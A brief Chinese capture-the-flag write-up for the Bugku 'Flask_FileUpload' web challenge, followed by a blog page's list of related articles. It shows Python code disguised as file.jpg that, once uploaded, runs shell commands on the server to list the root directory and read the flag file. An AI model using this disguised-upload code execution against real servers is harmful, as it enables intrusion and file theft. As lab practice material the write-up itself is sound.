技术栈

Bugku-web-Flask_FileUpload

黑白时光les2024-08-01 11:52

Bugku-web-Flask_FileUpload

查看源代码,提示用python返回结果

在file.jpg中写python代码

复制代码
import os
os.system('ls / ')

上传后查看源代码,找到flag文件夹

修改代码

复制代码
import os
os.system('cat /flag ')
上一篇:Python面试题:如何使用WebSocket实现实时Web应用
下一篇:单片机之串口通信协议
相关推荐
掘金安东尼
14 分钟前
中小厂前端候选人简历面试拆解:从 HR 面、技术面到主管面的双赢提问法
前端·面试
天平
9 小时前
油猴脚本创建webworker踩坑记录
前端·javascript·typescript
原则猫
10 小时前
前端基础大厦
前端
陈随易
12 小时前
编程语言级别的Skill市场,AI Agent 的未来形态
前端·后端·程序员
SoaringHeart
12 小时前
Flutter进阶:基于 EasyRefresh 的下拉刷新封装 n_easy_refresh_mixin.dart
前端·flutter
IT_陈寒
14 小时前
Vite的热更新突然不香了,排查三小时差点砸键盘
前端·人工智能·后端
子兮曰
15 小时前
Agency-Agents 深度解析:400+ AI 专家的"梦之队"如何重塑开发工作流
前端·后端·vibecoding
竹林818
15 小时前
用 The Graph 查询链上数据实战:从手搓 RPC 到 Subgraph,我的 NFT 项目数据加载快了 10 倍
前端·javascript
用户835629078051
16 小时前
Python 实现 PDF 文件加密与解密方法
后端·python
热门推荐
012026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf02GitHub 镜像站点03【AI】2026 年具身智能模型和世界模型总结04AI科技热点日报 | 2026年07月01日052026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?062026年6月AI大模型全景报告:GPT-5.6、Claude Opus 4.8、Gemini 3.5,中美AI三足鼎立谁主沉浮?072026 年 AI 大模型 & AI 编程工具实战全总结08Claude Code、Codex、Cursor三分天下:2026年AI编程Agent生态全景剖析092026年6月AI行业全景:从百模大战到Agent元年,这30天发生了什么?10Trae国际版与国内版深度测评:AI原生IDE的双生花